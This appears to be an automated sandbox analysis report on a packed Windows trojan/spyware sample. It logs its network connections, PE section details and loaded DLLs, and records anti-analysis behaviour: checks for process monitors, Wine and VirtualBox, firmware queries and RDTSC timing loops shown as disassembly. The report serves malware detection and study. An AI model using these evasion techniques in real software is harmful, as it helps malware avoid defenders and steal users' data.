                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: jSFUzuYPG9.exeStatic PE information: section name:
                Source: jSFUzuYPG9.exeStatic PE information: section name: .rsrc
                Source: jSFUzuYPG9.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AF4300_3_016AF430
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
                Source: jSFUzuYPG9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: jSFUzuYPG9.exeStatic PE information: Section: ZLIB complexity 0.9974114404965754
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f51efc0a-74d9-4ec7-9c39-26d8e1893b37Jump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403414219.0000000005E1A000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1428084440.0000000005E11000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403726937.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427969651.0000000005E1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: jSFUzuYPG9.exeReversingLabs: Detection: 63%
                Source: jSFUzuYPG9.exeVirustotal: Detection: 50%
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile read: C:\Users\user\Desktop\jSFUzuYPG9.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\jSFUzuYPG9.exe "C:\Users\user\Desktop\jSFUzuYPG9.exe"
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: jSFUzuYPG9.exeStatic file information: File size 2870272 > 1048576
                Source: jSFUzuYPG9.exeStatic PE information: Raw size of trstwfmm is bigger than: 0x100000 < 0x294c00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeUnpacked PE file: 0.2.jSFUzuYPG9.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: jSFUzuYPG9.exeStatic PE information: real checksum: 0x2c69ff should be: 0x2c313f
                Source: jSFUzuYPG9.exeStatic PE information: section name:
                Source: jSFUzuYPG9.exeStatic PE information: section name: .rsrc
                Source: jSFUzuYPG9.exeStatic PE information: section name: .idata
                Source: jSFUzuYPG9.exeStatic PE information: section name: trstwfmm
                Source: jSFUzuYPG9.exeStatic PE information: section name: ekycdelp
                Source: jSFUzuYPG9.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016ACE40 pushad ; iretd 0_3_016ACE41
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD158 pushad ; iretd 0_3_016AD159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD158 pushad ; iretd 0_3_016AD159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD158 pushad ; iretd 0_3_016AD159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016ACE55 pushad ; iretd 0_3_016ACE59
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016ACE10 pushad ; iretd 0_3_016ACE11
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD0E0 pushad ; iretd 0_3_016AD0E1
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD0E0 pushad ; iretd 0_3_016AD0E1
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD0E0 pushad ; iretd 0_3_016AD0E1
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD2D8 pushad ; iretd 0_3_016AD2D9
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD2D8 pushad ; iretd 0_3_016AD2D9
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AD2D8 pushad ; iretd 0_3_016AD2D9
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AFA8F push 00000001h; iretd 0_3_016AFAA0
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AFA81 push 00000001h; iretd 0_3_016AFAA0
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeCode function: 0_3_016AFA81 push 00000001h; iretd 0_3_016AFAA0
                Source: jSFUzuYPG9.exeStatic PE information: section name: entropy: 7.9813529381203026

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E1EC32 second address: E1EC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E1EC45 second address: E1EC7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F4BA0D3F156h 0x00000015 jl 00007F4BA0D3F156h 0x0000001b jnl 00007F4BA0D3F156h 0x00000021 popad 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E0A7EC second address: E0A7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E0A7F7 second address: E0A7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E1DD01 second address: E1DD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E1DD07 second address: E1DD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E1DD0B second address: E1DD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21984 second address: E2198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4BA0D3F156h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21A96 second address: E21AA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21AA0 second address: E21AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 6CC0A04Eh 0x0000000d xor dx, E4B5h 0x00000012 lea ebx, dword ptr [ebp+1244D8BCh] 0x00000018 mov dword ptr [ebp+122D1F3Dh], ebx 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F4BA0D3F166h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21BFC second address: E21C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21C0D second address: E21C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21C11 second address: E21C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21C17 second address: E21C35 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F4BA0D3F156h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E21D76 second address: E21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jnc 00007F4BA0D3970Ch 0x0000000c mov dword ptr [ebp+122D1D21h], ebx 0x00000012 push 00000003h 0x00000014 mov cx, C149h 0x00000018 mov dword ptr [ebp+122D280Dh], esi 0x0000001e push 00000000h 0x00000020 js 00007F4BA0D39709h 0x00000026 sub dl, FFFFFFFAh 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D27FCh], eax 0x00000031 push 8051659Fh 0x00000036 jmp 00007F4BA0D3970Bh 0x0000003b add dword ptr [esp], 3FAE9A61h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F4BA0D39708h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c mov dl, 24h 0x0000005e ja 00007F4BA0D3970Ah 0x00000064 call 00007F4BA0D39714h 0x00000069 and edx, dword ptr [ebp+122D2C57h] 0x0000006f pop edi 0x00000070 lea ebx, dword ptr [ebp+1244D8D0h] 0x00000076 jns 00007F4BA0D3970Ch 0x0000007c xchg eax, ebx 0x0000007d push edx 0x0000007e jmp 00007F4BA0D39717h 0x00000083 pop edx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jne 00007F4BA0D39716h 0x0000008d jmp 00007F4BA0D39710h 0x00000092 rdtsc
